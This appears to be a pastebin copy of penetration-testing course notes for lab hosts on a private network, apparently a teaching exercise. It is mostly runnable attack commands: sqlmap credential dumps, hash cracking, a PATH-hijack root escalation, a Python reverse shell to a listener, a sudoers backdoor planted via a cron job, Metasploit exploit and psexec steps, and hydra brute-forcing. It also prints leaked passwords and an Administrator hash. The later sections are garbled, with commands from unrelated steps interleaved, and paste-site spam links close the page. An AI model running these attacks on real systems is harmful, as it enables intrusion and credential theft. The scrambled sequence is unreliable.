python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql -T user -C User,Password --dump

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D phpmyadmin --tables

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users --columns

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users -C id,user,pass --dump

cat /home/infosecaddicts/.sqlmap/output/10.0.0.7/dump/seth/users.csv

cd toolz/



We can look this password hash up on Crackstation.net https://crackstation.net/ - ok that didn't work. Maybe it's in Base64. Let's try to decode it.



Decoding the base64 value gives us the actual hash. (Note I add a “=” to the string so that base64 can properly decode it)

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d

echo "c6d6bd7ebf806f43c76acc3681703b81" > hash.txt




We can look up this password hash "c6d6bd7ebf806f43c76acc3681703b81" on Crackstation.net https://crackstation.net/

Ok - that worked. The password is "omega", but if you want to do it with hashcat we can do the following steps:


sudo apt install -y nvidia-opencl-icd-340 libxnvctrl-dev nvidia-opencl-dev libgmp3-dev libgmp10-doc opencl-headers

wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz

tar -zxvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz

sudo ./opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25/install.sh

hashcat --benchmark


hashcat -m 0 -a 0 hash.txt ~/toolz/list.txt




Ok, now let's log into the machine.


ssh 10.0.0.7 -p 777 -lramses

cat /etc/issue

find / -user root -perm -4000 -print 2>/dev/null | grep -v bin | grep -v usr

cd /var/www/backup/

ls -l procwatch



Figure out how to root this box!!!!!!!!!!!!!!!!

whoami
ln -s /bin/ls ps
export PATH=`pwd`:${PATH}
./procwatch
ln -snf /bin/sh ps
./procwatch
whoami
cat /root/proof.txt


.......hahahahah rooted and polluted!!!!!!!!!

So now let's go attack .14 with this box.

nc -l -v -p 443


...from the webshell on 10.0.0.14 (http://10.0.0.14/test/cmd.php)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.7",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


This will give you a user level shell on 10.0.0.14

dpkg -l chkrootkit
ls -al /etc/sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update


....wait for it.....wait for it (a few hours possibly since it is cron.daily...)
sudo su

....now you are root


####################################
# Finally, let's exploit something #
####################################

#####################################
# Quick Stack Based Buffer Overflow #
#####################################
 
- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
 
- Extract this zip file to your Desktop
 
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
 
- Open a new command prompt and type:
nc localhost 9999
 
- In the new command prompt window where you ran nc type:
HELP
 
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
 
- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
 
 
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
 
- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
 
- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
 
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
 
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
 
- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
 
4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
 
5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
 
6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
 
7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444
 
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
 
 
------------------------------
 
cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
 
vi vulnserv.rb    (paste the code into this file)
 
 
 
cd ~/toolz/metasploit
 
./msfconsole
 
 
 
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.0.10
set RPORT 9999
exploit


*************************** Day 3 Challenge *******************************


******** Attacking Kevgir ********

I figured I've give you something fun to play with.

********************************** Figure out who and where you are **********************************
sudo nmap -sV -Pn 10.0.0.120

meterpreter> sysinfo
 
 
meterpreter> getuid
##############################

# Using Nikto against Kevgir #

##############################

cd ~/toolz/nikto-2.1.1

 
perl nikto.pl -update

 
perl nikto.pl -h 10.0.0.120

meterpreter> run get_local_subnets
perl nikto.pl -h 10.0.0.120:8080

 
perl nikto.pl -h 10.0.0.120:8081

********************************** Escalate privileges and get hashes **********************************
perl nikto.pl -h 10.0.0.120:9000

 
meterpreter> use priv
 
 
####################

# Using Metasploit #

####################


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
 
use auxiliary/scanner/http/http_version			

 
set RHOSTS 10.0.0.120

 
set RPORT 8080

	
	Got the following admin hash:
	Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

-------------------------------

 
use auxiliary/scanner/http/tomcat_enum			 

 
set RHOSTS 10.0.0.120


set RPORT 8080

	)K5?Jocb(Yx 

 
********************************** Enumerate the host you are on **********************************
 
meterpreter> run winenum
 
####################

# Attacking Tomcat #

####################

 
meterpreter > run post/windows/gather/usb_history
 
meterpreter > run post/windows/gather/enum_shares
use auxiliary/scanner/http/http_version			

meterpreter > run post/windows/gather/enum_snmp
set RHOSTS 10.0.0.120

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
set RPORT 8080

 
********************************** Get out of Meterpreter **********************************
 
meterpreter> background

msf exploit(savant_31_overflow) > back

use auxiliary/scanner/http/tomcat_mgr_login			 


set USERNAME tomcat

 
set USERPASS_FILE /home/infosecaddicts/list.txt

********************************** Lateral Movement *******************************
set STOP_ON_SUCCESS true

 
set RHOSTS 10.0.0.120


set RPORT 8080

use exploit/windows/smb/psexec
 
set SMBUser Administrator
 
set SMBPass )K5?Jocb(Yx
 
use exploit/multi/http/tomcat_mgr_upload

 
set USERNAME tomcat

 
set PASSWORD tomcat

 
set RHOST 10.0.0.120

 
set RPORT 8080

 
set PATH /manager/html


set PAYLOAD java/meterpreter/bind_tcp


exploit 


**********************************  
run post/linux/gather/checkvm

-- Option 2:
run post/linux/gather/enum_configs

 
run post/linux/gather/enum_protections

 
run post/linux/gather/enum_system

 
run post/linux/gather/enum_users_history

 
run post/linux/gather/hashdump

 
shell

 
/bin/bash




********************************** Set up your Pivot **********************************
 
dpkg -l

                                                        <-- background the session
cd /tmp

        msf exploit(handler) > back                     <--- you need to get to main msf> prompt
 
 
 
cat >> exploit.c << out

       
**************paste in the content from here *****************

https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c

 
route print												<--- should be blank
------ hit enter a few times ------

route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
------ then type 'out' ----- this closes the file handle...

 
route print                                             <----- verify new route
gcc -o boom exploit.c

******************************Scan through your Pivot ******************************
./boom

use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
 
set THREADS 10
 
-------------------------------

 
set PORTS 445
hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html

run


####################################
# Socks Tunneling with Proxychains #
#################

# Attacking FTP #

#################

sudo apt install -y proxychains
sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120

 
sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
cd ~/toolz/hydra

 
hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp

        socks4  127.0.0.1 1080
ftp

open 10.0.0.120

admin

admin

use auxiliary/server/socks4a
ls -lah

set SRVHOST 127.0.0.1
ls ../../

set SRVPORT 1080
 
#################

# Attacking SSH #

#################

cd ~/toolz/hydra

 
hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh

 
ssh -p 1322 admin@10.0.0.120

 
 
        ---close the duplicate putty session to your Ubuntu host




********************************** Begin Day 4 Homework Part 1 **********************************
use auxiliary/scanner/ssh/ssh_users			 


set USER_FILE /home/infosecaddicts/list.txt


set STOP_ON_SUCCESS true
You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day4.docx' (ex: Joseph-McCray-CyberWar-Day3.docx).

set RHOSTS 10.0.0.120


set RPORT 1322

Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.

********************************** End Day 4 Homework Part 1 **********************************


************************ Class Challenge ************************
 
use auxiliary/scanner/ssh/ssh_login			 

 
set USER_FILE /home/infosecaddicts/list.txt

https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip
set PASS_FILE /home/infosecaddicts/list.txt

I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
set STOP_ON_SUCCESS true


set RHOSTS 10.0.0.120


set RPORT 1322

#########
# Day 5 #
#########

sessions -l


sessions -u 1

Day 5 Task 1
sessions -i 1

https://goo.gl/forms/l2cMNg1F50kLQsHG2



Day 5 Task 2
Create an OSINT report on the retail company TARGET. You'll all work together on this and put together as thorough of a report as possible. 
#################

# Attacking NFS #

#################

rpcinfo -s 10.0.0.120


showmount -e 10.0.0.120

Use nmap to map the target network (10.0.0.0/24). 
mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock

Task 3a) Identify the number of reachable hosts.
ls /tmp/nfs

Task 3b) Identify the number of open ports per hosts.
cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts

umount -l /tmp/nfs


sudo apt-cache search fcrackzip


Task 3e) Put all of this information into a spreadsheet in the Google Drive folder
sudo apt install -y fcrackzip



fcrackzip -D -p /home/infosecaddicts/list.txt

Day 5 Task 4
unzip -P aaaaaa backup.tar.bz2.zip


tar -zxvf backup.tar.bz2

http://securityxploded.com/bruteforcing-filenames-on-webservers-using-dirbuster.php

###################

# Attacking Redis #

###################

sudo nmap -p 6379 --script=redis-info 10.0.0.120

Populate the findings spreadsheet with as much detail as possible

Public Pastes

⭐ get any gift card for FREE
JavaScript | 1 sec ago | 0.05 KB
⭐️ EARN $500 INSTANTLY⭐ D4
JavaScript | 4 sec ago | 0.18 KB
⭐ get any gift card for FREE
JavaScript | 8 sec ago | 0.05 KB
⭐️ EARN $500 INSTANTLY JR
JavaScript | 9 sec ago | 0.18 KB
⭐ FREE giftcards method
JavaScript | 9 sec ago | 0.05 KB
⭐ get any gift card for FREE
JavaScript | 10 sec ago | 0.05 KB
⭐ FREE giftcards method S4
JavaScript | 12 sec ago | 0.18 KB
⭐ FREE giftcards method⭐ ZV
JavaScript | 18 sec ago | 0.18 KB